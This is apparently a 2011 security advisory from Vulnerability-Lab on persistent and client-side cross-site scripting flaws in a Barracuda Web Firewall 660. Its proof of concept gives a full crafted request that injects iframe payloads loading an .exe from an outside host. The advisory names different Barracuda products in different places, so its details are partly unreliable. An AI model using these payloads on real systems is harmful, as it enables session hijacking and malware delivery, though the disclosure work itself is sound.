Document Title: =============== Barracuda Web Firewall 660 - Multiple Web Vulnerabilities Date: ===== 2011-12-16 References: =========== http://www.vulnerability-lab.com/get_content.php?id=29 VL-ID: ===== 30 Introduction: ============= The Barracuda Web Application Firewall is a complete and powerful security solution for Web applications and Web sites. The Barracuda Web Application Firewall provides award-winning protection against hackers leveraging protocol or application vulnerabilities to instigate data theft, denial of service or defacement of your Web site. * Protection against common attacks * Outbound data theft protection * Web site cloaking * Granular policies * Secure HTTP traffic * SSL Offloading * SSL Acceleration * Load Balancing The Barracuda Web Application Firewall protects Web applications and Web services from malicious attacks, and can also increase the performance and scalability of these applications. The Barracuda Web Application Firewall offers every capability needed to deliver, secure and manage enterprise Web applications from a single appliance through an intuitive, real-time user interface. * Single point of protection for inbound and outbound traffic for all Web applications * Protects Web sites and Web applications against application layer attacks * Delivers best practices security right out of the box * Monitors traffic and provides reports about attackers and attack attempts The Barracuda Web Application Firewall provides award-winning protection from all common attacks on Web applications, including SQL injections, cross-site scripting attacks, session tampering and buffer overflows. Many applications are vulnerable to such attacks because application developers do not consistently employ secure coding practices. Barracuda Web Application Firewall is designed to combat all attack types that have been categorized as significant threats, including: * Cross Site Scripting (XSS) * SQL injection flaws * OS command injections * Site reconnaissance * Session hijacking * Application denial of service * Malicious probes/crawlers * Cookie/session tampering * Path traversal * Information leakage ... (Copy of the Vendor Homepage: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php) Abstract: ========= Vulnerability-Lab team discovered multiple persistent Input Validation vulnerabilities on Barracudas Web Filter 910 appliance. Report-Timeline: ================ 2011-04-03: Vendor Notification 2011-05-09: Vendor Response/Feedback 2011-10-13: Vendor Fix/Patch (last check) 2011-12-18: Public or Non-Public Disclosure Status: ======== Published Affected Products: ================== Exploitation-Technique: ======================= Remote Severity: ========= High Details: ======== 1.1 Multiple persistent Input Validation vulnerabilities are detected on Barracudas SSL VPN 480. Local low privileged user account can implement/inject malicious persistent script code. When exploited by an authenticated user, the identified vulnerabilities can lead to information disclosure, access to intranet available servers, manipulated persistent content. Vulnerable Module(s): [+] Authorization Module [+] TroubleShooting - wGET Module [+] Web Site Translations [+] FTP Security Service Pictures: ../baracuda_fw660.png ../baracuda_fw660_2.png ../baracuda_fw660_3.png ../baracuda_fw660_4.png ../baracuda_fw660_5.png 1.2 Multiple client side cross site scripting vulnerabilities are detected on Barracudas IM-Firewall 620. Attackers can form malicious client-side requests to hijack customer/admin sessions. Successful exploitation requires user inter action & can lead to information disclosure, session hijacking and access to servers in the intranet. Pictures: ../ive1.png ../ive2.png Vulnerable Version(s): Barracuda Web Firewall 660 - v7.5.0.020 & older versions Proof of Concept: ================= The vulnerabilities can be exploited by local low privileged user accounts or remote attacker with high required user inter action. For demonstration or reproduce ... Manually reproduce ... 1. Login 2. Switch to the vulnerable module of the application 3. Switch to the vulnerable module & include your own script code. Save! 4. Enjoy the persistent output results 1.2 Vulnerable Module: Backup - Automated Configuration Backups File: index.cgi Para: ?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username= ... &&backup_password= References(URL): http://wsf.xxx.com/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//global-evolution.info%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US Site-Code Review: